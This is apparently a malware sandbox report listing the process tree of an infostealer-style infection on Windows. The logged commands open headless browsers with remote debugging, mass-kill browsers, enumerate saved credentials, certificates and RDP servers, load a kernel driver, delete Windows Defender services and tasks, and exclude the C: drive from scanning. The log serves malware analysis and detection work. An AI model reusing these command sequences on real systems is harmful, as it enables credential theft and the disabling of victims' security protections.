C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffff764dcf8,0x7ffff764dd04,0x7ffff764dd105⤵PID:3840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2468,i,1147691264049344960,11414905972028147505,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2460 /prefetch:25⤵
- Modifies registry class
PID:1896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2604,i,1147691264049344960,11414905972028147505,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2540 /prefetch:35⤵PID:4268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2912,i,1147691264049344960,11414905972028147505,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2928 /prefetch:85⤵PID:1664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=43895 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,1147691264049344960,11414905972028147505,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3160 /prefetch:15⤵
- Uses browser remote debugging
PID:3020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=43895 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3788,i,1147691264049344960,11414905972028147505,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1780 /prefetch:15⤵
- Uses browser remote debugging
PID:3248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=43895 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3404,i,1147691264049344960,11414905972028147505,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3968 /prefetch:15⤵
- Uses browser remote debugging
PID:4000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4708,i,1147691264049344960,11414905972028147505,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4704 /prefetch:85⤵PID:3924
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"4⤵
- Enumerates processes with tasklist
PID:13024
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
PID:6664
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"4⤵
- Enumerates processes with tasklist
PID:6872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=42134 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3776 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x240,0x7ffff538f208,0x7ffff538f214,0x7ffff538f2205⤵PID:976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=1920,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1928 /prefetch:25⤵
- Modifies registry class
PID:1880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2008,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2004 /prefetch:35⤵PID:3172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2376,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:85⤵PID:8360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=42134 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3396,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3392 /prefetch:15⤵
- Uses browser remote debugging
PID:9796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=42134 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3424,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3416 /prefetch:15⤵
- Uses browser remote debugging
PID:9812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4848,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4844 /prefetch:85⤵PID:10528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4956,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4952 /prefetch:85⤵PID:10428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5308,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:85⤵PID:8728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5308,i,14965940055804159119,2908593006540237630,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:85⤵PID:6044
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"4⤵
- Enumerates processes with tasklist
PID:9644
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵
- Kills process with taskkill
PID:9784
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe4⤵
- Kills process with taskkill
PID:9952
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe4⤵
- Kills process with taskkill
PID:10032
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe4⤵
- Kills process with taskkill
PID:10124
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe4⤵
- Kills process with taskkill
PID:10204
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe4⤵
- Kills process with taskkill
PID:10280
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe4⤵
- Kills process with taskkill
PID:10360
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe4⤵
- Kills process with taskkill
PID:10464
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe4⤵PID:10540
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe4⤵
- Kills process with taskkill
PID:10640
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe4⤵
- Kills process with taskkill
PID:10724
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe4⤵
- Kills process with taskkill
PID:10808
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe4⤵PID:10892
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe4⤵
- Kills process with taskkill
PID:11028
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe4⤵
- Kills process with taskkill
PID:11232
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe4⤵PID:11332
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe4⤵
- Kills process with taskkill
PID:11440
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe4⤵PID:11504
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
PID:11620
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵PID:11736
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe4⤵
- Kills process with taskkill
PID:11828
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe4⤵
- Kills process with taskkill
PID:11932
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe4⤵
- Kills process with taskkill
PID:12060
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe4⤵PID:12176
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe4⤵
- Kills process with taskkill
PID:6384
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe4⤵
- Kills process with taskkill
PID:12364
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe4⤵
- Kills process with taskkill
PID:12500
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe4⤵
- Kills process with taskkill
PID:12624
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe4⤵
- Kills process with taskkill
PID:12728
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe4⤵
- Kills process with taskkill
PID:2692
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe4⤵
- Kills process with taskkill
PID:12996
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe4⤵
- Kills process with taskkill
PID:13220
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe4⤵
- Kills process with taskkill
PID:1564
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe4⤵
- Kills process with taskkill
PID:13300
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe4⤵
- Kills process with taskkill
PID:3336
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list4⤵PID:13060
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵PID:13124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "4⤵
- Command and Scripting Interpreter: PowerShell
PID:12948 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list5⤵PID:216
-
-
-
C:\Windows\system32\certutil.exe"certutil" -store My4⤵PID:5844
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My4⤵PID:812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
PID:5608
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵PID:5928
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.744⤵PID:11196
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List4⤵PID:11916
-
-
C:\Windows\system32\hostname.exe"hostname"4⤵PID:12180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"4⤵
- Command and Scripting Interpreter: PowerShell
PID:12392
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List4⤵PID:7452
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall show allprofiles state4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8460
-
-
-
C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5536 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1410.tmp\1411.tmp\1412.bat C:\Users\Admin\AppData\Local\Temp\261.exe"5⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5312 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1558.tmp\1559.tmp\155A.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"7⤵
- Drops file in Program Files directory
PID:4800 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:4480
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:3476
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:5272
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:1604
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:5900
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:808
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1988
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:2300
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:4244
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:840
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:920
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:4460
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:3696
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:3480
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:2696
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:4464
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:5284
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:2196
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:1940
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:4248
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:2812
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:2432
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:556
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:4356
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:5472
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:380
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:4392
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:2512
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:1172
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:2732
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:4368
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:3840
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:2468
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:6004
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:3112
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:4448
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:5712
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:2016
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:2308
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:5132
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:5828
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:3496
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:3860
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:3212
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:1196
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:5924
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:4268
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:4024
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:5684
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:5832
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:5332
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:3748
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:2768
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:1100
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:1512
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:3932
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:5740
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:1948
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:1308
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:2228
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415800101\7c4e13424a.exe"C:\Users\Admin\AppData\Local\Temp\10415800101\7c4e13424a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2600 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415810101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10415810101\YGYZCmt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3248 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5444
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415820101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10415820101\Rm3cVPI.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4768
-
-
C:\Users\Admin\AppData\Local\Temp\10415830101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10415830101\p3hx1_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5212 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵PID:4656
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
PID:1972
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4104 -
